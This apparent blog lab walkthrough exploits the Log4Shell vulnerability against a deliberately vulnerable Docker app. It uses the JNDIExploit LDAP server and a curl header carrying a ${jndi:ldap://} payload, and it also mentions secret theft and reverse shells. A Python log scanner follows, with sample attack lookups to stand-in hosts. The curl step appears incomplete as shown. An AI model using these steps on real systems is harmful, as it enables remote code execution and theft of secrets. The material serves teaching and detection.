A recently discovered vulnerability in the popular Java logging tool Apache Log4j has been made public and the Internet is lit up like the proverbial Christmas tree! You can read up on Log4Shell over at Lunasec. There is also a list on GitHub showing the vulnerable web applications and vendors. But we’re here for the lab, so let’s get to it!

Disclaimer – as always only do this against a host you have explicit permission to do so with. Like your own lab, silly.

1 x Kali Linux VM, updated etc. The Kali VM IP is in this example.
Install Docker
Download the JNDIExploit
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip

Run the vulnerable Spring Boot web application:
sudo docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

1. Make sure the Docker Spring Boot web application is running.
sudo docker ps
2. Open a terminal window and start the JNDIExploit malicious LDAP server:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i -p 8888
3. Open a terminal tab and run the exploit:
curl -H 'X-Api-Version: ${jndi:ldap://}'
This will execute touch /tmp/pwned on the vulnerable web app.
4. Verify:
$ sudo docker exec vulnerable-app ls -la /tmp
total 20
drwxrwxrwt 1 root root 4096 Dec 12 16:08 .
drwxr-xr-x 1 root root 4096 Dec 12 15:42 ..
drwxr-xr-x 2 root root 4096 Dec 12 15:43 hsperfdata_root
-rw-r--r-- 1 root root 0 Dec 12 16:08 pwned

Annnd it’s done. This exploit is being used in all kinds of creative ways. The above is just a vanilla example. See this Twitter link where an attacker can serialise the JNDI LDAP string for secret environment variables and keys (GCP, AWS etc). I’ve also seen examples of a reverse shell with netcat.
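On the defender side, the request that triggers this lab is easy to spot in access logs: the ${jndi:...} lookup arrives in a header (X-Api-Version above). The following Python scanner is an added example, not code from the original post or from the vulnerable-app project; the log lines, IP addresses and log format are constructed for the demo.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not from the original post). The format
# is made up for this demo: client IP, request line, status, then one logged
# header. TEST-NET addresses are used as stand-ins for the attacker host.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2021:16:08:01 +0000] "GET / HTTP/1.1" 200 "X-Api-Version: ${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [12/Dec/2021:16:08:02 +0000] "GET / HTTP/1.1" 200 "X-Api-Version: 1.2.3"
10.0.0.5 - - [12/Dec/2021:16:08:03 +0000] "GET / HTTP/1.1" 200 "User-Agent: ${JNDI:rmi://198.51.100.7:1099/x}"
10.0.0.11 - - [12/Dec/2021:16:08:04 +0000] "GET /health HTTP/1.1" 200 "User-Agent: curl/7.79.1"
"""

# A Log4j JNDI lookup: ${jndi:<scheme>://<target>}. Matched case-insensitively
# because Log4j resolves the lookup name without regard to case, so "JNDI"
# works just as well as "jndi" against a vulnerable version.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s\"]*)", re.IGNORECASE)


def find_jndi_lookups(line: str) -> List[Dict[str, str]]:
    """Return every JNDI lookup found in one log line (empty list if none)."""
    return [{"scheme": m.group(1).lower(), "target": m.group(2)}
            for m in JNDI_RE.finditer(line)]


def scan_log(text: str) -> List[Dict[str, str]]:
    """Scan a whole log and return one alert per lookup, with the source IP
    and the remote host the vulnerable app would have been made to contact.
    Scanning every logged header, not just X-Api-Version, matters because any
    header the application logs is a possible injection point."""
    alerts = []
    for line in text.splitlines():
        src = line.split(" ", 1)[0]
        for hit in find_jndi_lookups(line):
            alerts.append({"src": src, **hit})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"ALERT src={a['src']} scheme={a['scheme']} target={a['target']}")
```

The remote target in each alert is what to block at the egress firewall while the app is patched; a vulnerable app making outbound LDAP or RMI connections to the Internet is itself a strong signal.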

The patch is out for Log4j; the issue is that so many web apps and vendors have to roll fixes individually.